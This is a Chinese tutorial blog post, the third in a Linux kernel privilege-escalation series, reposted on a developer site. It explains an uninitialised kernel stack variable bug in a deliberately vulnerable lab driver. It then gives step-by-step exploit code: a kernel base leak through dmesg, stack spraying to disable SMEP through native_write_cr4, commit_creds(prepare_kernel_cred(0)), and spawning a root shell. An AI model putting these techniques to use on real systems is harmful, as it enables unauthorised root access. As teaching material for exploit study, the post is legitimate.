linux内核驱动初始化流程,linux内核提权系列教程(3):栈变量未初始化漏洞

最新推荐文章于 2021-05-01 15:32:33 发布
最新推荐文章于 2021-05-01 15:32:33 发布
阅读量95 收藏
点赞数
文章标签: linux内核驱动初始化流程

本文从我的先知转过来。

说明:实验所需的驱动源码、bzImage、cpio文件见我的github进行下载。本教程适合对漏洞提权有一定了解的同学阅读,具体可以看看我先知之前的文章,或者我的简书。

一、 漏洞分析

1. 程序分析

总共两个驱动号,对应两个功能。

case UNINITIALISED_STACK_ALLOC:

{

ret = copy_to_stack((char *)p_arg);

break;

}

case UNINITIALISED_STACK_USE:

{

use_obj_args use_obj_arg;

if(copy_from_user(&use_obj_arg, p_arg, sizeof(use_obj_args)))

return -EINVAL;

use_stack_obj(&use_obj_arg);

break;

}

第1个功能->UNINITIALISED_STACK_ALLOC

// 布置内核栈: 能往内核栈上传入4096字节的数据

#define BUFF_SIZE 4096

noinline static int copy_to_stack(char __user *user_buff)

{

int ret;

char buff[BUFF_SIZE];

ret = copy_from_user(buff, user_buff, BUFF_SIZE);

buff[BUFF_SIZE - 1] = 0;

return ret;

}

第2个功能-> UNINITIALISED_STACK_USE

// 使用内核栈: 初始化内核栈数据

noinline static void use_stack_obj(use_obj_args *use_obj_arg)

{

volatile stack_obj s_obj; //volatile表示要求编译器不要对该变量作任何优化

if(use_obj_arg->option == 0)

{

s_obj.fn = uninitialised_callback;

s_obj.fn_arg = use_obj_arg->fn_arg;

}

s_obj.fn(s_obj.fn_arg);

}

// 结构

typedef struct stack_obj

{

int do_callback;

long fn_arg;

void (*fn)(long);

char buff[48];

}stack_obj;

typedef struct use_obj_args

{

int option;

long fn_arg;

}use_obj_args;

2. 漏洞分析

漏洞:只有(use_obj_arg->option == 0)时,才会初始化stack_obj对象。

利用:构造(use_obj_arg->option != 0),产生内核栈变量未初始化引用错误。本驱动其实简化了漏洞利用过程,因为可以直接利用驱动号UNINITIALISED_STACK_ALLOC来布置内核栈,不需要考虑用系统调用来布置。

二、 漏洞利用

1. 利用步骤

完整代码见exp_uninitialised_stack.c。

(1)单核执行

//step 1: 让程序只在单核上运行,以免只关闭了1个核的smep,却在另1个核上跑shell

void force_single_core()

{

cpu_set_t mask;

CPU_ZERO(&mask);

CPU_SET(0,&mask);

if (sched_setaffinity(0,sizeof(mask),&mask))

printf("[-----] Error setting affinity to core0, continue anyway, exploit may fault \n");

return;

}

(2)泄露内核基址

// step 2: 构造 page_fault 泄露kernel地址。从dmesg读取后写到/tmp/infoleak,再读出来

pid_t pid=fork();

if (pid==0){

do_page_fault();

exit(0);

}

int status;

wait(&status); // 等子进程结束

//sleep(10);

printf("[+] Begin to leak address by dmesg![+]\n");

size_t kernel_base = get_info_leak()-sys_ioctl_offset;

printf("[+] Kernel base addr : %p [+] \n", kernel_base);

(3)关闭smep

利用UNINITIALISED_STACK_ALLOC功能在内核栈上布置目标函数和所需参数,这样在发生栈变量未初始化使用时就会触发执行目标函数。

// step 3: 关闭smep

char buf[4096];

memset(buf, 0, sizeof(buf));

struct use_obj_args use_obj={

.option=1,

.fn_arg=1337,

};

for (int i=0; i<4096; i+=16)

{

memcpy(buf+i, &fake_cr4, 8); // 注意是fake_cr4所在地址

memcpy(buf+i+8, &native_write_cr4_addr, 8); // 注意是native_write_cr4_addr所在地址

}

ioctl(fd,UNINITIALISED_STACK_ALLOC, buf);

ioctl(fd,UNINITIALISED_STACK_USE, &use_obj);

(4)提权—commit_creds(prepare_kernel_cred(0))

// step 4: 提权,执行get_root(); 注意是把get_root()的地址拷贝过去,转一次

size_t get_root_addr = &get_root;

memset(buf, 0, sizeof(buf));

for (int i=0; i<4096; i+=8)

memcpy(buf+i, &get_root_addr, 8);

ioctl(fd,UNINITIALISED_STACK_ALLOC, buf);

ioctl(fd,UNINITIALISED_STACK_USE, &use_obj);

(5)返回shell

// step 5: 获得shell

if (getuid()==0)

{

printf("[+] Congratulations! You get root shell !!! [+]\n");

system("/bin/sh");

}

2. 利用结果

成功提权:

b28b964b9243

1-exp_uninitialised_stack_succeed.png

参考:

艾华丰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c++ 导入stack 头文件 stack申明_linux内核提权系列教程(3):变量初始化漏洞...
weixin_35530964的博客
12-23 275
一、 漏洞分析1. 程序分析总共两个驱动号,对应两个功能。case UNINITIALISED_STACK_ALLOC:{ ret = copy_to_stack((char*)p_arg);break;}case UNINITIALISED_STACK_USE:{ use_obj_args use_obj_arg;...
Linux内核启动中的驱动初始化顺序
dingkaich的专栏
07-31 497
转自 http://blog.csdn.net/mayaoyao11/article/details/6636977
ciscn_2019_ne_6(指针初始化漏洞)
seaaseesa的博客
06-11 572
ciscn_2019_ne_6(指针初始化漏洞) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在delete功能里,ptr指针存在初始化漏洞,因此其ptr的值可以通过其他函数来控制,造成任意地址free。 我们可以利用check函数来控制ptr初始化之前的值 然后构造double free,劫持free_hook即可。 #coding:utf8 from pwn import * #sh = process('./ciscn_2019_ne_6') sh =
初始化UAF漏洞
04-26
释放重引用(UAF)或者初始化漏洞题目,
浅析LxBlog V6变量初始化漏洞
kendyhj9999的专栏
05-23 721
浅析LxBlog V6变量初始化漏洞 http://huaidan.org/archives/2931.html 2009/03/17 0:37 | 鬼仔 | 技术文章 | 占个座先 作者:Flyh4t 本文已经发表在黑客防线,转载请署名 Lxblog 是 PHPWind 开发的一套基于 PHP+MySQL 数据库平台架构的多用户博客系统,强调整站与用户个体间的
Linux操作系统学习-内核初始化.pdf
07-07
Linux 操作系统学习 - 内核初始化 本文将对 Linux 操作系统的内核初始化进行分析和介绍,涵盖了内核初始化的主要步骤和关键概念。 一、内核初始化Linux 操作系统中,内核初始化是指从实模式到保护模式的切换...
嵌入式LINUX内核驱动进阶班第2天(U-Boot移植)
12-18
它负责初始化硬件,加载操作系统内核,并提供一个交互式的命令行环境。本课程“嵌入式LINUX内核驱动进阶班第2天(U-Boot移植)”深入探讨了如何将U-Boot移植到特定的嵌入式硬件平台上。以下是对这个主题的详细讲解:...
Linux内核设备驱动Linux内核模块加载机制笔记整理
09-15
Linux内核设备驱动是操作系统与硬件交互的关键,而内核模块加载机制则是动态扩展和管理内核功能的核心机制。在Linux系统中,内核模块允许我们根据需要加载或卸载特定的功能,而无需重启系统。以下是对Linux内核模块...
Ubuntu中为Android系统上编写Linux内核驱动程序实现方法
09-01
在Ubuntu环境下为Android系统编写Linux内核驱动程序是一项复杂但重要的任务,这涉及到对Linux内核、Android系统架构以及硬件接口的深入理解。本篇将详细介绍如何在Ubuntu中为Android设备构建内核驱动,以便更好地...
深入Linux设备驱动程序内核机制.pdf
最新发布
08-22
例如,`my_init`函数中,使用`alloc_chrdev_region`分配设备号,`cdev_init`初始化字符设备对象,`cdev_add`将驱动程序添加到内核设备列表中。而`my_exit`函数则负责清理工作,如调用`cdev_del`移除设备,`...
[buuctf]picoctf_2018_are you root初始化漏洞
weixin_46521144的博客
04-02 286
挺神奇的这道题,本地就是打不通,远程可以打通,绝了到底是为什么??? 本来以为这道题有一个指针置0的操作就没有UAF了,看来是我还见得太少,把UAF理解错了(其实我也没开始学堆哈哈哈哈) 参考了网上师傅的解答,发现这里是一个初始化漏洞。我画个帧大家就明白了 先写一下函数长什么样 帧长这样 注意到一开始v6是一个二级指针,也就是指向数组的数组 strtok分配的内容是存在*v6里面的,所以上述帧应该是对的 那么在用完free之后呢,这里的指针归零是指:不能再用该指针寻
分享一个 变量没有初始化 可能带来的问题
guilanl的专栏
02-22 1560
先看 code: static void do_ctors_aux(void) { /* SGX RTS does not support .ctors currently */ fp_t *p = NULL; uintptr_t init_array_addr; size_t init_array_size; const void *en
linux内核驱动初始化,如何调整Linux内核开启中的驱动初始化
weixin_35886269的博客
05-01 113
__define_initcall("1",fn,1)#define core_initcall_sync(fn) __define_initcall("1s",fn,1s)#define postcore_initcall(fn) __define_initcall("2",fn,2)#define postcore_initcall_sync(fn) __define_initcall...
Windows内核漏洞学习-初始化变量利用
WocW的博客
05-18 699
0x00:前言 今天继续学习HEVD的初始化变量漏洞利用,根据我的经验,只要是没涉及到堆的,难度应该都是不大的。原文讲的肯定比我好,我这里主要描述出调试过程。 传送门1-外文翻译成中文原文 传送门2-看雪一位原创 0x01:漏洞原理 首先看漏洞源码: NTSTATUS TriggerUninitializedStackVariable(IN PVOID UserBuffer) { ULONG UserValue = 0; ULONG MagicValue = 0xBAD0B0B0;
安全漏洞--释放重引用(UAF)漏洞分析
关注互联网安全的小虾米一枚
04-26 6488
漏洞简介 初始化漏洞一般是指堆变量没有设置就使用导致,或者可能更多的是部分初始化导致。 释放后再用漏洞是堆上的数据被释放后,某个残留地址没清除再用导致。其实就是初始化漏洞。 二 原理分析 windows系统测试代码 #include #include int main(int argc, char * argv[])
Linux设备驱动初始化流程
rexling1的专栏
09-17 3011
Linux设备驱动初始化流程一直不是很清楚,今天仔细看了一下linux初始化部分的代码才真正的搞明白,记录下来。           做过驱动的同学都知道,在arch/arm/目录下有和板级配置相关的文件,我使用的是Fresscale i.MX28开发板,在arch/arm/mach-mx28/目录下有mx28evk.c文件,该文件中有开发板初始化需要调用的函数。 MACHINE_STAR
Linux内核驱动程序初始化顺序的调整(1)
Win_cao专栏
09-29 4805
Linux内核驱动程序初始化顺序的调整 ,当在做一个驱动的时候要用到另一个驱动提供的API时,此时内核初始化时便碰到了一个依赖问题。 而这也是面试老生常谈的问题:   经常让你说下你做的驱动,然后你说XXX驱动后,很可能问下驱动细节后,会有另外一个问题:
linux驱动开发之内核对硬件初始化的方式
小灰灰的博客
01-29 1094
编写驱动的套路 0, 实例化全局的设备对象 1, 申请主设备号 2, 自动创建设备节点 3, 初始化硬件:ioremap(phys_addr_t offset, unsigned long size) 4,实现 file_operation 看底板原理图:知道想要LED1亮,需要在GPC0_3提供一个高电
如何调整Linux内核启动中的驱动初始化顺序-驱动加载优先级
旷野清泉-技术交流
05-12 5955
转载自:http://zhidao.baidu.com/link?url=adCsiTiI7i3QVYrTx19jkt_FvBV2VlQ4NV18pEu6Kdi4Yhv0ryauD3LHj1pxGE-YP8M_PxZnHNy-hVKBvzJOkPfqehZmR9CQm5GZ5XZDx-O Linux内核为不同驱动的加载顺序对应不同的优先级,定义了一些宏:  include\linux\init
Linux Kernel 日常分析总结
02-16
本文主要总结了Linux内核分析的一些关键点,包括匿名inode文件系统(anon_inodefs)的初始化、挂载过程以及内核中的函数调用流程。同时提到了工作队列的工作原理和初始化,网络协议初始化,如IP4和IP6,以及模块...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值